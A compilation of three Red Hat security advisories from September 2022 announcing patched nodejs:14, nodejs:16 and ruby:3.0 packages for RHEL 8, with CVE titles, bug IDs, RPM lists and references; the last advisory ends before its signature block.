Red Hat Security Advisory 2022-6448-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include a HTTP request smuggling vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs:14 security and bug fix update  
Advisory ID:       RHSA-2022:6448-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6448  
Issue date:        2022-09-13  
CVE Names:         CVE-2022-32212 CVE-2022-32213 CVE-2022-32214   
                   CVE-2022-32215 CVE-2022-33987   
=====================================================================

1. Summary:

An update for the nodejs:14 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* nodejs: DNS rebinding in --inspect via invalid IP addresses  
(CVE-2022-32212)

* nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
(CVE-2022-32213)

* nodejs: HTTP request smuggling due to improper delimiting of header  
fields (CVE-2022-32214)

* nodejs: HTTP request smuggling due to incorrect parsing of multi-line  
Transfer-Encoding (CVE-2022-32215)

* got: missing verification of requested URLs allows redirects to UNIX  
sockets (CVE-2022-33987)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* nodejs:14/nodejs: rebase to latest upstream release (BZ#2106367)

* nodejs:14/nodejs: Specify --with-default-icu-data-dir when using  
bootstrap build (BZ#2111417)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2102001 - CVE-2022-33987 got: missing verification of requested URLs allows redirects to UNIX sockets  
2105422 - CVE-2022-32212 nodejs: DNS rebinding in --inspect via invalid IP addresses  
2105426 - CVE-2022-32215 nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding  
2105428 - CVE-2022-32214 nodejs: HTTP request smuggling due to improper delimiting of header fields  
2105430 - CVE-2022-32213 nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
2106367 - nodejs:14/nodejs: rebase to latest upstream release [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.src.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16231+7c1b33d9.src.rpm  
nodejs-packaging-23-3.module+el8.3.0+6519+9f98ed83.src.rpm

aarch64:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.aarch64.rpm

noarch:  
nodejs-docs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.noarch.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16231+7c1b33d9.noarch.rpm  
nodejs-packaging-23-3.module+el8.3.0+6519+9f98ed83.noarch.rpm

ppc64le:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.ppc64le.rpm

s390x:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.s390x.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.s390x.rpm

x86_64:  
nodejs-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-debuginfo-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-debugsource-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-devel-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
nodejs-full-i18n-14.20.0-2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm  
npm-6.14.17-1.14.20.0.2.module+el8.6.0+16231+7c1b33d9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32212  
https://access.redhat.com/security/cve/CVE-2022-32213  
https://access.redhat.com/security/cve/CVE-2022-32214  
https://access.redhat.com/security/cve/CVE-2022-32215  
https://access.redhat.com/security/cve/CVE-2022-33987  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB7NzjgjWX9erEAQi+GhAAiXG9iBXr215vvQfz+nTteMZatx8rYbmP  
SMj+YySptChtc8Y1BZvbB6uyhDtNYkkz1qWiNCw1nrbNBtI2XrbUWg06TNf+7AFZ  
HYkwtC77dT1Pm09AgXK0F3s1sckigqilY4hYnI25MjavOXZ0eXkbPXeQbFlyDKLG  
JB3qc2or3Zjcbx2bGPGa1vTaBghpmV72h6UK38EOeq2fs/Hmoid2uZt+0o4D9P9j  
9PYTqhVCapZIZkCZszXAqhO+8+AFymip1h1NVD48Il57NpTXcw+3luwfBx6KSdQj  
eb68MzmO0f75G2bMlPXB2r+f5f0Yr+k/7ljKvCd6CiQc2vJTuh4ojIthue4b9bNR  
++SNS5za43IPa/SYpojqHWMXrDSQR7GfR4VmN4CP4Hhn/7T9oL6pVf168zIARsvG  
/qA6fqh2k768el1V1STK+2Cum2i6mDGNvREp1KqnEnkVkWxRUVY0ZGCesEwX2jaV  
pPmk74abdZUeCja3OYFD9Ca99R2PWD7qfTVhuJJQJlZMlyFmf41SUfwzY0O4INsA  
FRhCxlKZL8BtiMiykzXOofax06NNBFNIXYbzBYBGqqZm8hiYXwdsWXI1tFe8RZSV  
aJeC5Qc7labBGhpSHkReIsjC/0RJ2zg8jE6axvhcA656F2Jb590Dmyy2T+OEX6HO  
OzI3A+IYzXw=  
=hjLi  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6448-01

Red Hat Security Advisory 2022-6449-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and denial of service vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs:16 security and bug fix update  
Advisory ID:       RHSA-2022:6449-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6449  
Issue date:        2022-09-13  
CVE Names:         CVE-2021-3807 CVE-2022-32212 CVE-2022-32213   
                   CVE-2022-32214 CVE-2022-32215 CVE-2022-33987   
=====================================================================

1. Summary:

An update for the nodejs:16 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

Security Fix(es):

* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching  
ANSI escape codes (CVE-2021-3807)

* nodejs: DNS rebinding in --inspect via invalid IP addresses  
(CVE-2022-32212)

* nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
(CVE-2022-32213)

* nodejs: HTTP request smuggling due to improper delimiting of header  
fields (CVE-2022-32214)

* nodejs: HTTP request smuggling due to incorrect parsing of multi-line  
Transfer-Encoding (CVE-2022-32215)

* got: missing verification of requested URLs allows redirects to UNIX  
sockets (CVE-2022-33987)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* nodejs:16/nodejs: rebase to latest upstream release (BZ#2106369)

* nodejs:16/nodejs: Specify --with-default-icu-data-dir when using  
bootstrap build (BZ#2111416)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes  
2102001 - CVE-2022-33987 got: missing verification of requested URLs allows redirects to UNIX sockets  
2105422 - CVE-2022-32212 nodejs: DNS rebinding in --inspect via invalid IP addresses  
2105426 - CVE-2022-32215 nodejs: HTTP request smuggling due to incorrect parsing of multi-line Transfer-Encoding  
2105428 - CVE-2022-32214 nodejs: HTTP request smuggling due to improper delimiting of header fields  
2105430 - CVE-2022-32213 nodejs: HTTP request smuggling due to flawed parsing of Transfer-Encoding  
2106369 - nodejs:16/nodejs: rebase to latest upstream release [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.src.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16240+7ca51420.src.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.src.rpm

aarch64:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.aarch64.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.aarch64.rpm

noarch:  
nodejs-docs-16.16.0-3.module+el8.6.0+16248+76b0e185.noarch.rpm  
nodejs-nodemon-2.0.19-2.module+el8.6.0+16240+7ca51420.noarch.rpm  
nodejs-packaging-25-1.module+el8.5.0+10992+fac5fe06.noarch.rpm

ppc64le:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.ppc64le.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.ppc64le.rpm

s390x:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.s390x.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.s390x.rpm

x86_64:  
nodejs-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-debuginfo-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-debugsource-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-devel-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
nodejs-full-i18n-16.16.0-3.module+el8.6.0+16248+76b0e185.x86_64.rpm  
npm-8.11.0-1.16.16.0.3.module+el8.6.0+16248+76b0e185.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-3807  
https://access.redhat.com/security/cve/CVE-2022-32212  
https://access.redhat.com/security/cve/CVE-2022-32213  
https://access.redhat.com/security/cve/CVE-2022-32214  
https://access.redhat.com/security/cve/CVE-2022-32215  
https://access.redhat.com/security/cve/CVE-2022-33987  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyCB5tzjgjWX9erEAQjcVQ/+Pcpf3Z3/DDwJh4jY2GGrA/WhG0SvMeTm  
YQxAaRYuhfOlxxjTiiAaUVd1DYdhPpussgGnE7CcRkoK5lR8cbmB6c74xdyjQFau  
D2G4YAVGRXyVT3kg0wP3QB7UdZH1rB9KI+5RhHMmkBBA4EpHwxxAmMSnsvWut3E+  
ocKV+0dPvdPU4AemtUKC9gAjrPDfi+4CFfHhEDWLuATSRmL/pDDiz2WLM06A3u/r  
DudYd1iNEoNLM/aA8HULhA4FTk+8RKoAuNcfO7rJQVhWtOdvJPK5GuJMziDEhToP  
aK1r84ShqzXmmxVu0CWYN3saYaf7BD51RiA7eFjzYFbjRSmqzfxvluLVEqM2HnQq  
3yMSOgk/wO79gqpkWIa4DU6+LPWEjDj9y1sJIIN2XFHScXIAv7NwhoxH4R7D5Pe2  
bj5MOmUa64DJGOjwKiLZ7yCjJHpm7RpVuNK3v9wvwoKRcGOEMlkNpbHtgMOiWslC  
ljCy6v7QmYGSThzKTfTsB6QjIUSjDr6x0GCCl87TrYNDDUxhBybCk+i0+9EpXB7j  
0DUiK3GhID7JRIMA5nFRrmpY9AIjeV5hMq2GCjHk3g3wGSk59rHZeKEQSVC+ZAmX  
EzMOFxa62RDOkxkOBrqa4U4kCXzHmtJsJgGKRKV3GwdDd/+C8LmBAlguB9Dumaz/  
l0sgCdVTvRU=  
=n6kC  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6449-01

Red Hat Security Advisory 2022-6450-01 - Ruby is an extensible, interpreted, object-oriented, scripting language. It has features to process text files and to perform system management tasks. Issues addressed include denial of service, double free, and spoofing vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: ruby:3.0 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2022:6450-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6450  
Issue date:        2022-09-13  
CVE Names:         CVE-2021-41817 CVE-2021-41819 CVE-2022-28738   
                   CVE-2022-28739   
=====================================================================

1. Summary:

An update for the ruby:3.0 module is now available for Red Hat Enterprise  
Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Ruby is an extensible, interpreted, object-oriented, scripting language. It  
has features to process text files and to perform system management tasks.

The following packages have been upgraded to a later upstream version: ruby  
(3.0.4). (BZ#2109431)

Security Fix(es):

* ruby: Regular expression denial of service vulnerability of Date parsing  
methods (CVE-2021-41817)

* ruby: Cookie prefix spoofing in CGI::Cookie.parse (CVE-2021-41819)

* Ruby: Double free in Regexp compilation (CVE-2022-28738)

* Ruby: Buffer overrun in String-to-Float conversion (CVE-2022-28739)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* ruby 3.0: User-installed rubygems plugins are not being loaded [RHEL8]  
(BZ#2110981)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2025104 - CVE-2021-41817 ruby: Regular expression denial of service vulnerability of Date parsing methods  
2026757 - CVE-2021-41819 ruby: Cookie prefix spoofing in CGI::Cookie.parse  
2075685 - CVE-2022-28738 Ruby: Double free in Regexp compilation  
2075687 - CVE-2022-28739 Ruby: Buffer overrun in String-to-Float conversion  
2109431 - ruby:3.0/ruby: Rebase to the latest Ruby 3.0 release [rhel-8] [rhel-8.6.0.z]  
2110981 - ruby 3.0: User-installed rubygems plugins are not being loaded [RHEL8] [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.src.rpm  
rubygem-abrt-0.4.0-1.module+el8.5.0+11580+845038eb.src.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.src.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.src.rpm

aarch64:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.aarch64.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.aarch64.rpm

noarch:  
ruby-default-gems-3.0.4-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
ruby-doc-3.0.4-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-abrt-0.4.0-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-abrt-doc-0.4.0-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-bundler-2.2.33-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-irb-1.3.5-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-minitest-5.14.2-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-mysql2-doc-0.5.3-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-pg-doc-1.2.3-1.module+el8.5.0+11580+845038eb.noarch.rpm  
rubygem-power_assert-1.2.0-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rake-13.0.3-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rbs-1.4.0-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rdoc-6.3.3-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rexml-3.2.5-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-rss-0.2.9-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-test-unit-3.3.7-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygem-typeprof-0.15.2-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygems-3.2.33-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm  
rubygems-devel-3.2.33-141.module+el8.6.0+16311+3e5e17e9.noarch.rpm

ppc64le:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.ppc64le.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.ppc64le.rpm

s390x:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.s390x.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.s390x.rpm

x86_64:  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-debugsource-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-devel-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-libs-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
ruby-libs-debuginfo-3.0.4-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-bigdecimal-3.0.0-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-bigdecimal-debuginfo-3.0.0-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-io-console-0.5.7-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-io-console-debuginfo-0.5.7-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-json-2.5.1-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-json-debuginfo-2.5.1-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-mysql2-0.5.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-mysql2-debuginfo-0.5.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-mysql2-debugsource-0.5.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-pg-1.2.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-pg-debuginfo-1.2.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-pg-debugsource-1.2.3-1.module+el8.5.0+11580+845038eb.x86_64.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-psych-3.3.2-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.i686.rpm  
rubygem-psych-debuginfo-3.3.2-141.module+el8.6.0+16311+3e5e17e9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-41817  
https://access.redhat.com/security/cve/CVE-2021-41819  
https://access.redhat.com/security/cve/CVE-2022-28738  
https://access.redhat.com/security/cve/CVE-2022-28739  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

